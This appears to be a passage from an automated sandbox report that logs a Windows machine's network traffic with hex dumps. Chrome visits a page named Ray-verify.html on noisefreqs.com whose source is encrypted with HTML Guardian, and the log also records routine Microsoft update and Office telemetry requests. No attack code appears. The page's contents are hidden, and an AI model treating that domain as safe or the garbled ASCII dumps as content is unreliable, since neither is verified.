              Date: Fri, 29 Nov 2024 23:40:36 GMT
              Content-Type: image/jpeg
              Content-Length: 771
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 00 14 00 19 03 01 11 00 02 11 01 03 11 01 ff c4 00 18 00 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 06 07 04 05 ff c4 00 2a 10 00 01 03 03 02 05 02 07 00 00 00 00 00 00 00 00 01 02 03 04 05 06 11 00 31 13 21 32 41 81 15 22 07 12 51 53 71 91 a1 ff c4 00 1a 01 00 02 02 03 00 00 00 00 00 00 00 00 00 00 00 00 03 05 02 04 00 01 06 ff c4 00 2a 11 00 02 01 03 02 04 04 07 00 00 00 00 00 00 00 00 01 02 11 00 03 31 04 21 05 12 13 51 14 22 61 81 06 23 41 71 a1 c1 f0 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ae dd 57 2b 96 [TRUNCATED]
              Data Ascii: JFIFHHC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222*1!2A"QSq*1!Q"a#Aq?W+bv*(ln1o]mLok*"p{X2fQEA7tAMbSs=enn,e-_|jQh|N{&KquR*l_vKrJ@'lg}Tl,`opb%]P;3*xA@}2D"\R{AT*#O_.x8PDL)'3q[\E0Di%ICHAwYe q.!d7U\bwHNM_sIVi*PyglN4[WZ$1"=<j"4v#)5<$Aqp8P>`9u>
              Nov 30, 2024 00:41:21.284240961 CET6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.44976368.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:35.081655025 CET277OUTGET /next.gif HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:36.284502029 CET996INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:36 GMT
              Content-Type: image/gif
              Content-Length: 787
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Data Raw: 47 49 46 38 39 61 1e 00 1e 00 e6 ff 00 14 13 13 72 6d 6d 4a 47 47 c0 c0 c0 29 28 28 c0 be be ff ff ff e8 e8 e8 df df df de de de dd dd dd db db db d2 d2 d2 cf cf cf cd cd cd cb cb cb ca ca ca c5 c5 c5 c4 c4 c4 c1 c1 c1 bc bc bc b9 b9 b9 b7 b7 b7 b5 b5 b5 b3 b3 b3 b1 b1 b1 af af af ad ad ad a9 a9 a9 a7 a7 a7 a6 a6 a6 a5 a5 a5 9f 9f 9f 9b 9b 9b 9a 9a 9a 96 96 96 94 94 94 8e 8e 8e 8d 8d 8d 8c 8c 8c 8a 8a 8a 87 87 87 86 86 86 84 84 84 80 80 80 7c 7c 7c 7b 7b 7b 79 79 79 78 78 78 77 77 77 76 76 76 75 75 75 74 74 74 71 71 71 70 70 70 6f 6f 6f 6e 6e 6e 6d 6d 6d 6a 6a 6a 68 68 68 66 66 66 65 65 65 64 64 64 63 63 63 62 62 62 61 61 61 60 60 60 5d 5d 5d 5b 5b 5b 5a 5a 5a 59 59 59 58 58 58 56 56 56 54 54 54 53 53 53 52 52 52 51 51 51 4c 4c 4c 4b 4b 4b 4a 4a 4a 49 49 49 48 48 48 47 47 47 46 46 46 45 45 45 42 42 42 3e 3e 3e 3d 3d 3d 3c 3c 3c 3a 3a 3a 38 38 38 37 37 37 34 34 34 33 33 33 32 32 32 30 30 30 2f 2f 2f 2e 2e 2e 2a 2a 2a 29 29 29 28 28 28 22 22 22 21 21 21 20 20 20 1f 1f 1f 1e 1e 1e 1d 1d 1d 1b 1b 1b 19 [TRUNCATED]
              Data Ascii: GIF89armmJGG)((|||{{{yyyxxxwwwvvvuuutttqqqpppooonnnmmmjjjhhhfffeeedddcccbbbaaa```]]][[[ZZZYYYXXXVVVTTTSSSRRRQQQLLLKKKJJJIIIHHHGGGFFFEEEBBB>>>===<<<:::888777444333222000///...***)))((("""!!! !,@;?'-Pf9/yHcvwwx3ndDxxD54&#%0FZjqu[eca\$H<*:LQXbmqtyn.5 "8Ugqvx61YKv(<qbj58ds+)H>yC*:o`r)E84&I3p1(|\IcZCCRdh@1CQ!pbPAS4Yn%c7`/02(7l&8C,g,PKJCDR;l)[P#;
              Nov 30, 2024 00:41:21.299875021 CET6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.44973923.218.208.109443
              TimestampBytes transferredDirectionData
              2024-11-29 23:40:17 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              Accept-Encoding: identity
              User-Agent: Microsoft BITS/7.8
              Host: fs.microsoft.com
              2024-11-29 23:40:17 UTC478INHTTP/1.1 200 OK
              Content-Type: application/octet-stream
              Server: Kestrel
              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
              X-Ms-ApiVersion: Distribute 1.2
              X-Ms-Region: prod-weu-z1
              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
              X-OSID: 2
              X-CID: 2
              X-CCC: GB
              Cache-Control: public, max-age=97180
              Date: Fri, 29 Nov 2024 23:40:17 GMT
              Connection: close
              X-CID: 2


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.449740166.1.209.924433168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-11-29 23:40:17 UTC672OUTGET /Ray-verify.html HTTP/1.1
              Host: noisefreqs.com
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              sec-ch-ua-platform: "Windows"
              Upgrade-Insecure-Requests: 1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Sec-Fetch-Site: none
              Sec-Fetch-Mode: navigate
              Sec-Fetch-User: ?1
              Sec-Fetch-Dest: document
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-11-29 23:40:18 UTC279INHTTP/1.1 200 OK
              Server: nginx/1.26.2
              Date: Fri, 29 Nov 2024 23:40:18 GMT
              Content-Type: text/html; charset=UTF-8
              Content-Length: 10563
              Connection: close
              Last-Modified: Wed, 27 Nov 2024 12:52:55 GMT
              ETag: "2943-627e471c497c0"
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              2024-11-29 23:40:18 UTC10563INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 27 47 45 4e 45 52 41 54 4f 52 27 20 43 6f 6e 74 65 6e 74 3d 27 54 68 65 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 66 20 74 68 69 73 20 70 61 67 65 20 69 73 20 65 6e 63 72 79 70 74 65 64 20 77 69 74 68 20 48 54 4d 4c 20 47 75 61 72 64 69 61 6e 2c 20 20 74 68 65 20 77 6f 72 6c 64 27 73 20 73 74 61 6e 64 61 72 74 20 66 6f 72 20 77 65 62 73 69 74 65 20 70 72 6f 74 65 63 74 69 6f 6e 2e 20 56 69 73 69 74 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 6f 74 77 61 72 65 2e 63 6f 6d 20 66 6f 72 20 64 65 74 61 69 6c 73 27 3e 3c 6d 65 74
              Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><met


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.449741166.1.209.924433168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-11-29 23:40:18 UTC599OUTGET /favicon.ico HTTP/1.1
              Host: noisefreqs.com
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              sec-ch-ua-platform: "Windows"
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Sec-Fetch-Site: same-origin
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: image
              Referer: https://noisefreqs.com/Ray-verify.html
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-11-29 23:40:18 UTC170INHTTP/1.1 404 Not Found
              Server: nginx/1.26.2
              Date: Fri, 29 Nov 2024 23:40:18 GMT
              Content-Type: text/html; charset=iso-8859-1
              Content-Length: 277
              Connection: close
              2024-11-29 23:40:18 UTC277INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 6f 69 73 65 66 72 65 71 73 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at noisefreqs.com Port 443</ad


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.44974223.218.208.109443
              TimestampBytes transferredDirectionData
              2024-11-29 23:40:19 UTC239OUTGET /fs/windows/config.json HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              Accept-Encoding: identity
              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
              Range: bytes=0-2147483646
              User-Agent: Microsoft BITS/7.8
              Host: fs.microsoft.com
              2024-11-29 23:40:19 UTC535INHTTP/1.1 200 OK
              Content-Type: application/octet-stream
              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
              ApiVersion: Distribute 1.1
              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
              X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
              Cache-Control: public, max-age=156947
              Date: Fri, 29 Nov 2024 23:40:19 GMT
              Content-Length: 55
              Connection: close
              X-CID: 2
              2024-11-29 23:40:19 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.44974652.149.20.212443
              TimestampBytes transferredDirectionData
              2024-11-29 23:40:26 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XutZmyL2PtaZank&MD=3+svr3o1 HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
              Host: slscr.update.microsoft.com
              2024-11-29 23:40:27 UTC560INHTTP/1.1 200 OK
              Cache-Control: no-cache
              Pragma: no-cache
              Content-Type: application/octet-stream
              Expires: -1
              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
              MS-CorrelationId: 235113a3-584a-40fd-a684-58455cd64482
              MS-RequestId: d96174e7-0487-453f-8d8f-971cb165f20b
              MS-CV: TolQCaY820+YAC4W.0
              X-Microsoft-SLSClientCache: 2880
              Content-Disposition: attachment; filename=environment.cab
              X-Content-Type-Options: nosniff
              Date: Fri, 29 Nov 2024 23:40:26 GMT
              Connection: close
              Content-Length: 24490
              2024-11-29 23:40:27 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
              2024-11-29 23:40:27 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.44976520.109.210.53443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:06 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XutZmyL2PtaZank&MD=3+svr3o1 HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
              Host: slscr.update.microsoft.com
              2024-11-29 23:41:07 UTC560INHTTP/1.1 200 OK
              Cache-Control: no-cache
              Pragma: no-cache
              Content-Type: application/octet-stream
              Expires: -1
              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
              MS-CorrelationId: cbf1ebf9-7027-4675-bdf7-ffd59f1b916e
              MS-RequestId: 34e54d15-b759-436a-91e1-fba575a1899c
              MS-CV: 100dZsRqqkWiUuHk.0
              X-Microsoft-SLSClientCache: 1440
              Content-Disposition: attachment; filename=environment.cab
              X-Content-Type-Options: nosniff
              Date: Fri, 29 Nov 2024 23:41:05 GMT
              Connection: close
              Content-Length: 30005
              2024-11-29 23:41:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
              2024-11-29 23:41:07 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


              Session IDSource IPSource PortDestination IPDestination Port
              6192.168.2.44976613.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:09 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:09 UTC471INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:09 GMT
              Content-Type: text/plain
              Content-Length: 218853
              Connection: close
              Vary: Accept-Encoding
              Cache-Control: public
              Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
              ETag: "0x8DD0EF5BC53602D"
              x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234109Z-174f7845968cdxdrhC1EWRg0en00000010fg00000000mryf
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:09 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
              2024-11-29 23:41:09 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
              Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
              2024-11-29 23:41:10 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
              Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
              2024-11-29 23:41:10 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
              Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
              2024-11-29 23:41:10 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 